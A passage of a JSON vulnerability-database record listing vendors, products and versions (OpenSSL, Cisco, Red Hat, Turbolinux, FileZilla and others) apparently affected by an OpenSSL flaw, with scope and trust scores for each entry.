            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "_id": null,
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "11.5.10cu2"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "9.2.0.8"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "turbolinux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10_f"
          },
          {
            "_id": null,
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (hosting)"
          },
          {
            "_id": null,
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "1.0 (workgroup)"
          },
          {
            "_id": null,
            "model": "turbolinux appliance server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "turbolinux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "_id": null,
            "model": "turbolinux fuji",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "_id": null,
            "model": "turbolinux multimedia",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "_id": null,
            "model": "turbolinux personal",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10"
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "10 (x64)"
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11"
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "11 (x64)"
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "7"
          },
          {
            "_id": null,
            "model": "turbolinux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": "8"
          },
          {
            "_id": null,
            "model": "wizpy",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "_id": null,
            "model": "home",
            "scope": null,
            "trust": 0.8,
            "vendor": "turbo linux",
            "version": null
          },
          {
            "_id": null,
            "model": "trendmicro interscan web security suite",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "trend micro",
            "version": "1.1 solaris edition"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux advanced workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "_id": null,
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "_id": null,
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "_id": null,
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "_id": null,
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "_id": null,
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(1)"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "_id": null,
            "model": "s8700 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "s8300 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "linux professional oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "8"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154548.0"
          },
          {
            "_id": null,
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "x8610.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "appliance server workgroup edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(2)"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.2"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "s8710 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "server c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "grid engine update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "linux database server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r5.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(3)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "grid engine update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "hardware management console",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.2.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(0)"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "server 0.9.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.4.0"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "call manager es32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "call manager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1-1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1(1)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.8"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.9"
          },
          {
            "_id": null,
            "model": "server a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "propack sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sgi",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "computing snapgear sg560",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "suse linux school server for i386",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for gauntlet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "current",
            "scope": null,
            "trust": 0.3,
            "vendor": "openpkg",
            "version": null
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "networks meridian option 51c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7"
          },
          {
            "_id": null,
            "model": "solaris data encryption kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.6.0"
          },
          {
            "_id": null,
